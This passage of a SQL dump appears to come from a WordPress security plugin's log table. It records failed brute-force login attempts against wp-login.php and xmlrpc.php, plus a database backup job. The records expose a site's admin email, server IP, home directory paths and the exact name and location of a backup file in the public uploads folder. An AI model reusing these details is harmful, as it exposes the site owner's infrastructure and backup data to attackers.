Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"51366\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGfFiqbKGlf1IVly7OVfAAAAUs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568775959.0563\";s:12:\"REQUEST_TIME\";s:10:\"1568775959\";}}','notice','2019-09-18 03:06:00','2019-09-18 03:05:59',17741336,19233960,'https://bintara.com.my/wp-login.php',1,0,'119.28.180.62'),(24867,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"51732\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGfGW4SfF9g@8lNlxwsogAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568775961.5863\";s:12:\"REQUEST_TIME\";s:10:\"1568775961\";}}','notice','2019-09-18 03:06:03','2019-09-18 03:06:01',18259616,19559960,'https://bintara.com.my/xmlrpc.php',1,0,'119.28.180.62'),(24868,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"206.189.231.196\";s:11:\"REMOTE_PORT\";s:5:\"21174\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGgYq1FqYKvioG46Y4UXwAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568776290.9853\";s:12:\"REQUEST_TIME\";s:10:\"1568776290\";}}','notice','2019-09-18 03:11:32','2019-09-18 03:11:31',17741784,19233296,'https://bintara.com.my/wp-login.php',1,0,'206.189.231.196'),(24869,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"206.189.231.196\";s:11:\"REMOTE_PORT\";s:5:\"21954\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGgZiR0vdvYEIduPCLXmwAAAQw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568776295.0034\";s:12:\"REQUEST_TIME\";s:10:\"1568776295\";}}','notice','2019-09-18 03:11:36','2019-09-18 03:11:35',18259240,19558736,'https://bintara.com.my/xmlrpc.php',1,0,'206.189.231.196'),(24870,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"55066\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGiIG4SfF9g@8lNlxwtHgAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568776736.3218\";s:12:\"REQUEST_TIME\";s:10:\"1568776736\";}}','notice','2019-09-18 03:18:57','2019-09-18 03:18:56',17741584,19233944,'https://bintara.com.my/wp-login.php',1,0,'159.253.32.120'),(24871,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"55522\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGiI0QGijxhVPhG1M0ODQAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568776739.5452\";s:12:\"REQUEST_TIME\";s:10:\"1568776739\";}}','notice','2019-09-18 03:19:01','2019-09-18 03:18:59',18259296,19559264,'https://bintara.com.my/xmlrpc.php',1,0,'159.253.32.120'),(24872,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-09-18 03:29:49','2019-09-18 03:29:12',19103096,76005896,'wp-cron',1,0,'103.6.198.69'),(24873,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1568172425;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190918-112913-fcaTqFFx2igyfSbJLH0Lzr3xExiiEg.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190918-112913-fcaTqFFx2igyfSbJLH0Lzr3xExiiEg.zip\";s:4:\"size\";i:2843270;}','notice','2019-09-18 03:29:50','2019-09-18 03:29:12',22607232,76005896,'wp-cron',1,0,'103.6.198.69'),(24874,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"59396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGlRK1FqYKvioG46Y4X@AAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568777540.9971\";s:12:\"REQUEST_TIME\";s:10:\"1568777540\";}}','notice','2019-09-18 03:32:22','2019-09-18 03:32:21',17741888,19234480,'https://bintara.com.my/wp-login.php',1,0,'159.253.32.120'),(24875,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"59930\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGlSCqbKGlf1IVly7OXJQAAAU4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568777544.5505\";s:12:\"REQUEST_TIME\";s:10:\"1568777544\";}}','notice','2019-09-18 03:32:25','2019-09-18 03:32:24',18259648,19558944,'https://bintara.com.my/xmlrpc.php',1,0,'159.253.32.120'),(24876,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.169\";s:11:\"REMOTE_PORT\";s:5:\"47528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGlcEQGijxhVPhG1M0OvQAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568777584.8766\";s:12:\"REQUEST_TIME\";s:10:\"1568777584\";}}','notice','2019-09-18 03:33:06','2019-09-18 